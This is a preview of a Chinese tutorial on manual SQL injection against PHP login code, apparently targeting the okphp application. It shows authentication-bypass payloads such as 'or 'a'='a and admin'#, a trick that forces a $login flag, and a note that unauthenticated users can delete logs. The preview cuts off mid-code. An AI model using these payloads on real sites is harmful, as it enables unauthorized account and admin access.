返回
手工注射php和jsp

手工注射php和jsp

ID:14858817

大小:66.50 KB

页数:23页

时间:2018-07-30

手工注射php和jsp_第1页
手工注射php和jsp_第2页
手工注射php和jsp_第3页
手工注射php和jsp_第4页
手工注射php和jsp_第5页
资源描述:

《手工注射php和jsp》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、手工注射PHP和JSP对于ASP注入我们太了解了,本章介绍如果注入PHP和JSP一手工注射PHP代码:$conn=sql_connect($dbhost,$dbuser,$dbpswd,$dbname);$password=md5($password);$q="selectid,group_idfrom$user_tablewhereusername=’$username’andpassword=’$password’";$res=sql_query($q,$conn);$row=sql_fetch_row($res);$q="selectid,group_idfrom$user_

2、tablewhereusername=’$username’andpassword=’$password’"中$username和$password没过滤,很容易就绕过。对于select*from$user_tablewhereusername=’$username’andpassword=’$password’这样的语句改造的方法有:构造1(利用逻辑运算):$username=’or’a’=’a$password=’or’a’=’a相当于sql语句:select*from$user_tablewhereusername=or’a’=’a’andpassword=or’a’=’a’

3、构造2(利用mysql里的注释语句#,/*把$password注释掉):$username=admin’#(或admin’/*)即:select*from$user_tablewhereusername=’admin’#’andpassword=’$password’"相当于:select*from$user_tablewhereusername=’admin’在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2:selectid,group_idfrom$user_tablewhereuserna

4、me=’admin’#’andpassword=’$password’"相当于:selectid,group_idfrom$user_tablewhereusername=’admin’只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id,我们就可以这样构造:$username=’orid=1#相当于:selectid,group_idfrom$user_tablewhereusername=’’orid=1#andpassword=’$password’(#后的被注释掉)我们接着往下看代码:if($row[0]){//Ifnotadminorsupermoder

5、atorif($username!="admin"&&!eregi("(^

6、&)3($

7、&)",$row[1])){$login=0;}else{$login=1;}}//Failtologin---if(!$login){write_log("Moderatorlogin","0","passwordwrong");echo"";exit();}//Access!-else{session_start();呵呵~~最后简单通过一个$login来判断,我们只要ie提交直接提交$login=1就可以绕过了:)。2.users/login.php注射导致绕过身份验证漏洞:代码:$md5

8、password=md5($password);$q="selectid,group_id,emailfrom$user_tablewhereusername=’$username’andpassword=’$md5password’";$res=sql_query($q,$conn);$row=sql_fetch_row($res);$username没过滤利用同1里注释掉andpassword=’$md5password’";就绕过啦。3.adminloglist.php存在任意删除日志记录漏洞。(ps:这个好象和php+mysql注射无关,随便提一下)okphp的后台好象写得

9、很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码:$arr=array("del_log","log_id","del_id");get_r($arr);//if($del_log){省略........if($log_id){foreach($log_idas$val){$q="deletefrom$log_tablewhereid=’$val’";$res=sql_query($q,$conn);if($res){$i++

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。